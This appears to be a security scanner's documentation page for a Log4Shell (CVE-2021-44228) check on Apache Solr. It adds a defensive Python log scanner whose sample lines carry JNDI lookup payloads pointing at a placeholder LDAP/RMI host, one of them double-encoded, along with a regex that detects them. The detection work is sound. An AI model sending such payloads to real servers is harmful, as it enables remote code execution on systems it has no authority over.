Access Control: Apache Solr 7+ - Remote Code Execution (Apache Log4j)
Identifier:
apache_solr_log4j_rce
Scanner(s) Support
| GraphQL Scanner | REST Scanner | WebApp Scanner | ASM Scanner |
|---|---|---|---|
Description
Apache Solr 7+ is affected by the Apache Log4j remote code execution vulnerability (CVE-2021-44228): Log4j's JNDI features do not protect against attacker-controlled LDAP and other JNDI endpoints, which allows remote code execution.
How we test: We test for Log4j remote code execution vulnerabilities in Apache Solr by injecting JNDI lookup payloads into log messages and parameters, then analyzing responses to detect if remote code execution is possible.
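A defender-side counterpart to the test described above, as an added example that is not part of the scanner or its documentation: it scans Solr request logs for JNDI lookup strings, including percent-encoded ones, to spot probing of this issue. The log lines are constructed samples modelled on Solr request logging, and the host name is a placeholder.

```python
import re
from urllib.parse import unquote

# Constructed sample lines (not real traffic); host names are placeholders.
SAMPLE_LOG = """\
2021-12-11 09:14:02.118 INFO  (qtp1-21) [   x:demo] o.a.s.c.S.Request [demo]  webapp=/solr path=/select params={q=*:*&rows=10} status=0 QTime=4
2021-12-11 09:14:05.902 INFO  (qtp1-23) [   x:demo] o.a.s.c.S.Request [demo]  webapp=/solr path=/select params={q=${jndi:ldap://probe.example.invalid/a}} status=400 QTime=1
2021-12-11 09:14:07.377 INFO  (qtp1-19) [   x:demo] o.a.s.c.S.Request [demo]  webapp=/solr path=/select params={q=%2524%257Bjndi%253Armi%253A%252F%252Fprobe.example.invalid%252Fa%257D} status=400 QTime=1
2021-12-11 09:14:09.001 INFO  (qtp1-19) [   x:demo] o.a.s.c.S.Request [demo]  webapp=/solr path=/select params={q=title:jndi+tutorial} status=0 QTime=2
"""

# A JNDI lookup expression: "${jndi:<scheme>://<endpoint>". Only the literal
# form is matched, after percent-decoding; the bare word "jndi" is ignored.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/}\s:]+)", re.IGNORECASE)


def decode_fully(text, max_rounds=3):
    """Percent-decode repeatedly so double-encoded values are also exposed."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def find_jndi_lookups(log_text):
    """Return one finding per log line that carries a JNDI lookup string."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        match = JNDI_RE.search(decode_fully(line))
        if match:
            findings.append({
                "line": lineno,
                "scheme": match.group(1).lower(),
                "endpoint": match.group(2),
                # True when the lookup only became visible after decoding.
                "encoded": "${" not in line,
            })
    return findings


if __name__ == "__main__":
    for finding in find_jndi_lookups(SAMPLE_LOG):
        print(finding)
```

A hit shows that someone sent a lookup string, not that it was evaluated; whether the instance is exposed depends on the Log4j version and configuration Solr runs with.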
Reference:
- https://solr.apache.org/security.html#apache-solr-affected-by-apache-log4j-cve-2021-44228
- https://twitter.com/sirifu4k1/status/1470011568834424837
- https://github.com/apache/solr/pull/454
- https://logging.apache.org/log4j/2.x/security.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
- https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2021-44228
Configuration
Example
Example configuration:
Reference
skip
Type: boolean
Skip the test if true.